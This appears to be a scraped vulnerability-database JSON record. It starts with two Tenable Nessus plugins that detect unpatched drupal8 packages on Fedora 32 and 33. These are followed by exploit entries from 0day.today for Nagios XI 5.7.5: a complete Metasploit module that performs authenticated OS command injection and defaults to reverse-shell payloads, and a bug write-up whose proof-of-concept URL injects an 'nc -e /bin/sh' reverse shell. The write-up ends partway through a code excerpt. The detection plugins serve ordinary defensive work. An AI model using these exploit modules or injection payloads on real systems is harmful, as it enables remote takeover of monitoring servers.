"cpe": ["p-cpe:/a:fedoraproject:fedora:drupal8", "cpe:/o:fedoraproject:fedora:33"], "id": "FEDORA_2020-6F1079934C.NASL", "href": "https://www.tenable.com/plugins/nessus/144225", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-6f1079934c.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(144225);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/30\");\n\n script_cve_id(\"CVE-2020-13666\", \"CVE-2020-13667\", \"CVE-2020-13668\", \"CVE-2020-13669\", \"CVE-2020-13670\", \"CVE-2020-13671\", \"CVE-2020-28948\", \"CVE-2020-28949\");\n script_xref(name:\"FEDORA\", value:\"2020-6f1079934c\");\n script_xref(name:\"IAVA\", value:\"2020-A-0545-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0541-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/15\");\n\n script_name(english:\"Fedora 33 : drupal8 (2020-6f1079934c)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"- https://www.drupal.org/project/drupal/releases/8.9.11\n\n- https://www.drupal.org/project/drupal/releases/8.9.10\n\n - https://www.drupal.org/sa-core-2020-013\n (CVE-2020-28948 / CVE-2020-28949)\n\n- https://www.drupal.org/project/drupal/releases/8.9.9\n\n - https://www.drupal.org/sa-core-2020-012\n (CVE-2020-13671)\n\n- https://www.drupal.org/project/drupal/releases/8.9.8\n\n- https://www.drupal.org/project/drupal/releases/8.9.7\n\n- https://www.drupal.org/project/drupal/releases/8.9.6\n\n - https://www.drupal.org/sa-core-2020-011\n (CVE-2020-13670)\n\n - https://www.drupal.org/sa-core-2020-010\n (CVE-2020-13669)\n\n - https://www.drupal.org/sa-core-2020-009\n (CVE-2020-13668)\n\n - https://www.drupal.org/sa-core-2020-008\n (CVE-2020-13667)\n\n - https://www.drupal.org/sa-core-2020-007\n (CVE-2020-13666)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-6f1079934c\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2020-007\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2020-008\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2020-009\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2020-010\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2020-011\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2020-012\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2020-013\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected drupal8 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-28949\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PEAR Archive_Tar 1.4.10 Arbitrary File Write');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:33\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^33([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 33\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC33\", reference:\"drupal8-8.9.11-1.fc33\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal8\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:26:37", "description": "- https://www.drupal.org/project/drupal/releases/8.9.11\n\n- https://www.drupal.org/project/drupal/releases/8.9.10\n\n - https://www.drupal.org/sa-core-2020-013 (CVE-2020-28948 / CVE-2020-28949)\n\n- https://www.drupal.org/project/drupal/releases/8.9.9\n\n - https://www.drupal.org/sa-core-2020-012 (CVE-2020-13671)\n\n- https://www.drupal.org/project/drupal/releases/8.9.8\n\n- https://www.drupal.org/project/drupal/releases/8.9.7\n\n- https://www.drupal.org/project/drupal/releases/8.9.6\n\n - https://www.drupal.org/sa-core-2020-011 (CVE-2020-13670)\n\n - https://www.drupal.org/sa-core-2020-010 (CVE-2020-13669)\n\n - https://www.drupal.org/sa-core-2020-009 (CVE-2020-13668)\n\n - https://www.drupal.org/sa-core-2020-008 (CVE-2020-13667)\n\n - https://www.drupal.org/sa-core-2020-007 (CVE-2020-13666)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-12-15T00:00:00", "type": "nessus", "title": "Fedora 32 : drupal8 (2020-d50d74d6f2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-13666", "CVE-2020-13667", "CVE-2020-13668", "CVE-2020-13669", "CVE-2020-13670", "CVE-2020-13671", "CVE-2020-28948", "CVE-2020-28949"], "modified": "2022-08-30T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:drupal8", "cpe:/o:fedoraproject:fedora:32"], "id": "FEDORA_2020-D50D74D6F2.NASL", "href": "https://www.tenable.com/plugins/nessus/144247", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-d50d74d6f2.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(144247);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/30\");\n\n script_cve_id(\"CVE-2020-13666\", \"CVE-2020-13667\", \"CVE-2020-13668\", \"CVE-2020-13669\", \"CVE-2020-13670\", \"CVE-2020-13671\", \"CVE-2020-28948\", \"CVE-2020-28949\");\n script_xref(name:\"FEDORA\", value:\"2020-d50d74d6f2\");\n script_xref(name:\"IAVA\", value:\"2020-A-0545-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0541-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/15\");\n\n script_name(english:\"Fedora 32 : drupal8 (2020-d50d74d6f2)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"- https://www.drupal.org/project/drupal/releases/8.9.11\n\n- https://www.drupal.org/project/drupal/releases/8.9.10\n\n - https://www.drupal.org/sa-core-2020-013\n (CVE-2020-28948 / CVE-2020-28949)\n\n- https://www.drupal.org/project/drupal/releases/8.9.9\n\n - https://www.drupal.org/sa-core-2020-012\n (CVE-2020-13671)\n\n- https://www.drupal.org/project/drupal/releases/8.9.8\n\n- https://www.drupal.org/project/drupal/releases/8.9.7\n\n- https://www.drupal.org/project/drupal/releases/8.9.6\n\n - https://www.drupal.org/sa-core-2020-011\n (CVE-2020-13670)\n\n - https://www.drupal.org/sa-core-2020-010\n (CVE-2020-13669)\n\n - https://www.drupal.org/sa-core-2020-009\n (CVE-2020-13668)\n\n - https://www.drupal.org/sa-core-2020-008\n (CVE-2020-13667)\n\n - https://www.drupal.org/sa-core-2020-007\n (CVE-2020-13666)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-d50d74d6f2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2020-007\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2020-008\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2020-009\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2020-010\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2020-011\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2020-012\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2020-013\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected drupal8 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-28949\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PEAR Archive_Tar 1.4.10 Arbitrary File Write');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:32\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^32([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 32\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC32\", reference:\"drupal8-8.9.11-1.fc32\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal8\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2023-05-28T04:27:00", "description": "This Metasploit module exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298, which are OS command injection vulnerabilities in the windowswmi, switch, and cloud-vm configuration wizards that allow an authenticated user to perform remote code execution on Nagios XI versions 5.5.6 to 5.7.5 as the apache user. Valid credentials for a Nagios XI user are required. This module has been successfully tested against official NagiosXI OVAs versions 5.5.6 through 5.7.5.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-13T00:00:00", "type": "zdt", "title": "Nagios XI 5.7.5 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25296", "CVE-2021-25297", "CVE-2021-25298"], "modified": "2023-02-13T00:00:00", "id": "1337DAY-ID-38194", "href": "https://0day.today/exploit/description/38194", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HTTP::NagiosXi\n include Msf::Exploit::CmdStager\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection',\n 'Description' => %q{\n This module exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298, which are\n OS command injection vulnerabilities in the windowswmi, switch, and cloud-vm\n configuration wizards that allow an authenticated user to perform remote code\n execution on Nagios XI versions 5.5.6 to 5.7.5 as the apache user.\n\n Valid credentials for a Nagios XI user are required. This module has\n been successfully tested against official NagiosXI OVAs from 5.5.6-5.7.5.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Matthew Mathur'\n ],\n 'References' => [\n ['CVE', '2021-25296'],\n ['CVE', '2021-25297'],\n ['CVE', '2021-25298'],\n ['URL', 'https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md']\n ],\n 'Platform' => %w[linux unix],\n 'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],\n 'Targets' => [\n [\n 'Linux (x86)', {\n 'Arch' => [ ARCH_X86 ],\n 'Platform' => 'linux',\n 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }\n }\n ],\n [\n 'Linux (x64)', {\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => 'linux',\n 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }\n }\n ],\n [\n 'CMD', {\n 'Arch' => [ ARCH_CMD ],\n 'Platform' => 'unix',\n # the only reliable payloads against a typical Nagios XI host (CentOS 7 minimal) seem to be cmd/unix/reverse_perl_ssl and cmd/unix/reverse_openssl\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl' }\n }\n ]\n ],\n 'Privileged' => false,\n 'DefaultTarget' => 2,\n 'DisclosureDate' => '2021-02-13',\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],\n 'Reliability' => [ REPEATABLE_SESSION ]\n }\n )\n )\n\n register_options [\n OptString.new('TARGET_CVE', [true, 'CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298)', 'CVE-2021-25296'])\n ]\n end\n\n def username\n datastore['USERNAME']\n end\n\n def password\n datastore['PASSWORD']\n end\n\n def finish_install\n datastore['FINISH_INSTALL']\n end\n\n # Returns a status code an a error message on failure.\n # On success returns the status code and an array so we\n # can update the login_result and res_array variables appropriately.\n def handle_unsigned_license(res_array, username, password, finish_install)\n auth_cookies, nsp = res_array\n sign_license_result = sign_license_agreement(auth_cookies, nsp)\n if sign_license_result\n return 5, 'Failed to sign license agreement'\n end\n\n print_status('License agreement signed. The module will wait for 5 seconds and retry the login.')\n sleep 5\n login_result, res_array = login_after_install_or_license(username, password, finish_install)\n case login_result\n when 1..4 # An error occurred, propagate the error message\n return login_result, res_array[0]\n when 5 # The Nagios XI license agreement still has not been signed\n return 5, 'Failed to sign the license agreement.'\n end\n\n return login_result, res_array\n end\n\n def authenticate\n # Use nagios_xi_login to try and authenticate.\n login_result, res_array = nagios_xi_login(username, password, finish_install)\n case login_result\n when 1..3 # An error occurred, propagate the error message\n return login_result, res_array[0]\n when 4 # Nagios XI is not fully installed\n install_result = install_nagios_xi(password)\n if install_result # On installation failure, result is an array with the code and error message\n return install_result[0], install_result[1]\n end\n\n login_result, res_array = login_after_install_or_license(username, password, finish_install)\n case login_result\n when 1..4 # An error occurred, propagate the error message\n return login_result, res_array[0]\n when 5 # The license agreement still needs to be signed\n login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)\n return login_result, res_array unless (login_result == 0)\n end\n when 5 # The license agreement still needs to be signed\n login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)\n return login_result, res_array unless (login_result == 0)\n end\n\n print_good('Successfully authenticated to Nagios XI.')\n # Extract the authenticated cookies and nsp to use throughout the module\n if res_array.length == 2\n auth_cookies = res_array[1]\n if auth_cookies && /nagiosxi=[a-z0-9]+;/.match(auth_cookies)\n @auth_cookies = auth_cookies\n else\n return login_result, 'Failed to extract authentication cookies'\n end\n nsp = res_array[0].match(/nsp_str = \"([a-z0-9]+)/)\n if nsp\n @nsp = nsp[1]\n else\n return login_result, 'Failed to extract nsp string'\n end\n else\n return login_result, 'Failed to extract auth cookies and nsp string'\n end\n\n # Set the version here so both check and exploit can use it\n nagios_version = nagios_xi_version(res_array[0])\n if nagios_version.nil?\n return 6, 'Unable to obtain the Nagios XI version from the dashboard'\n end\n\n print_status(\"Target is Nagios XI with version #{nagios_version}.\")\n\n # Versions of NagiosXI pre-5.2 have different formats (5r1.0, 2014r2.7, 2012r2.8b, etc.) that Rex cannot handle,\n # so we set pre-5.2 versions to 1.0.0 for easier Rex comparison because the module only works on post-5.2 versions.\n if /^\\d{4}r\\d(?:\\.\\d)?(?:(?:RC\\d)|(?:[a-z]{1,3}))?$/.match(nagios_version) || nagios_version == '5r1.0'\n nagios_version = '1.0.0'\n end\n @version = Rex::Version.new(nagios_version)\n\n return 0, 'Successfully authenticated and retrieved NagiosXI Version.'\n end\n\n def check\n # Authenticate to ensure we can access the NagiosXI version\n auth_result, err_msg = authenticate\n case auth_result\n when 1\n return CheckCode::Unknown(err_msg)\n when 2, 4, 5, 6\n return CheckCode::Detected(err_msg)\n when 3\n return CheckCode::Safe(err_msg)\n end\n\n if @version >= Rex::Version.new('5.5.6') && @version <= Rex::Version.new('5.7.5')\n return CheckCode::Appears\n end\n\n return CheckCode::Safe\n end\n\n def execute_command(cmd, _opts = {})\n if [email\u00a0protected] || [email\u00a0protected]_cookies # Check to see if we already authenticated during the check\n auth_result, err_msg = authenticate\n case auth_result\n when 1\n fail_with(Failure::Disconnected, err_msg)\n when 2, 4, 5, 6\n fail_with(Failure::UnexpectedReply, err_msg)\n when 3\n fail_with(Failure::NotVulnerable, err_msg)\n end\n end\n\n # execute payload based on the selected targeted configuration wizard\n url_params = {\n 'update' => 1,\n 'nsp' => @nsp\n }\n # After version 5.5.7, the URL parameter used in CVE-2021-25297 and CVE-2021-25298\n # changes from address to ip_address\n if @version <= Rex::Version.new('5.5.7')\n address_param = 'address'\n else\n address_param = 'ip_address'\n end\n\n # CVE-2021-25296 affects the windowswmi configuration wizard.\n if datastore['TARGET_CVE'] == 'CVE-2021-25296'\n url_params = url_params.merge({\n 'nextstep' => 3,\n 'wizard' => 'windowswmi',\n 'ip_address' => Array.new(4) { rand(256) }.join('.'),\n 'domain' => Rex::Text.rand_text_alphanumeric(7..15),\n 'username' => Rex::Text.rand_text_alphanumeric(7..20),\n 'password' => Rex::Text.rand_text_alphanumeric(7..20),\n 'plugin_output_len' => Rex::Text.rand_text_numeric(5) + \"; #{cmd};\"\n })\n # CVE-2021-25297 affects the switch configuration wizard.\n elsif datastore['TARGET_CVE'] == 'CVE-2021-25297'\n url_params = url_params.merge({\n 'nextstep' => 3,\n 'wizard' => 'switch',\n address_param => Array.new(4) { rand(256) }.join('.') + \"\\\"; #{cmd};\",\n 'snmpopts[snmpcommunity]' => Rex::Text.rand_text_alphanumeric(7..15),\n 'scaninterfaces' => 'on'\n })\n # CVE-2021-25298 affects the cloud-vm configuration wizard, which we can access by\n # specifying the digitalocean option for the wizard parameter.\n elsif datastore['TARGET_CVE'] == 'CVE-2021-25298'\n url_params = url_params.merge({\n address_param => Array.new(4) { rand(256) }.join('.') + \"; #{cmd};\",\n 'nextstep' => 4,\n 'wizard' => 'digitalocean'\n })\n else\n fail_with(Failure::BadConfig, 'Invalid TARGET_CVE: Choose CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298.')\n end\n\n print_status('Sending the payload...')\n # Send the final request. Note that the target is not expected to respond if we get\n # code execution. Therefore, we set the timeout on this request to 0.\n send_request_cgi({\n 'method' => 'GET',\n 'uri' => '/nagiosxi/config/monitoringwizard.php',\n 'cookie' => @auth_cookies,\n 'vars_get' => url_params\n })\n end\n\n def exploit\n if target.arch.first == ARCH_CMD\n execute_command(payload.encoded)\n else\n execute_cmdstager(background: true)\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/38194", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-09-09T22:25:43", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-26T00:00:00", "type": "zdt", "title": "Nagios XI 5.7.5 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25299", "CVE-2021-25297", "CVE-2021-25298", "CVE-2021-25296"], "modified": "2021-02-26T00:00:00", "id": "1337DAY-ID-35875", "href": "https://0day.today/exploit/description/35875", "sourceData": "# nagios-xi-5.7.5-bugs\r\nBugs reported to Nagios XI\r\n\r\n\r\n## CVE-2021-25296\r\n\r\n### Code Location\r\n\r\n`/usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php`\r\n\r\n### Code snippet\r\n\r\n```php\r\nif (!empty($plugin_output_len)) {\r\n $disk_wmi_command .= \" --forcetruncateoutput \" . $plugin_output_len;\r\n $service_wmi_command .= \" --forcetruncateoutput \" . $plugin_output_len;\r\n $process_wmi_command .= \" --forcetruncateoutput \" . $plugin_output_len;\r\n}\r\necho $disk_wmi_command;\r\n// Run the WMI plugin to get realtime info\r\nexec($disk_wmi_command, $disk_output, $disk_return_var);\r\nexec($service_wmi_command, $service_output, $service_return_var);\r\nexec($process_wmi_command, $process_output, $process_return_var);\r\n```\r\n\r\n### POC (Works with admin/non-admin authentication)\r\n\r\n`https://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=50c0f98fe9018dc43c81672ad1aeed5fd3f9710f013381519e553f846b5c2a86&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&plugin_output_len=&ip_address=127.0.0.1&domain=127.0.0.1&username=asdf&password=asdf&auth_file=&plugin_output_len=1024; nc -e /bin/sh 127.0.0.1 4444;&submitButton2=`\r\n\r\nThe `plugin_output_len` variable here is not sanitized and can give `command execution`. Eg: `plugin_output_len=1024; nc -e /bin/sh 127.0.0.1 4444;`\r\n\r\n\r\n## CVE-2021-25297\r\n\r\n### Code Location\r\n\r\n`/usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php`\r\n\r\n### Code Snippet\r\n\r\n```php\r\nfunction switch_configwizard_add_cfg_to_mrtg($address)\r\n{\r\n // get the data that we need\r\n $mrtg_confd_dir = \"/etc/mrtg/conf.d\";\r\n echo $address;\r\n $mrtg_cfg_file = \"{$address}.cfg\";\r\n $absolute_mrtg_cfg_file = \"{$mrtg_confd_dir}/{$mrtg_cfg_file}\";\r\n $cfgmaker_file = switch_configwizard_get_walk_file($address);\r\n // check if the file already exists for useful debugging\r\n $mrtg_confd_contents = scandir($mrtg_confd_dir);\r\n echo \"REACHED HERE1\";\r\n if (in_array($mrtg_cfg_file, $mrtg_confd_contents)) {\r\n debug(\"{$mrtg_cfg_file} exists in {$mrtg_confd_dir}, overwriting\");\r\n } else {\r\n debug(\"{$mrtg_cfg_file} does not exist in {$mrtg_confd_dir}, creating\");\r\n }\r\n echo \"REACHED HERE2\";\r\n // copy the cfgmaker file to the mrtg cfg destination\r\n echo $cfgmaker_file;\r\n echo $absolute_mrtg_cfg_file;\r\n if (!copy($cfgmaker_file, $absolute_mrtg_cfg_file)) {\r\n debug(\"Unable to copy from {$cfgmaker_file} to {$absolute_mrtg_cfg_file}\");\r\n return false;\r\n }\r\n echo \"REACHED HERE3\";\r\n echo 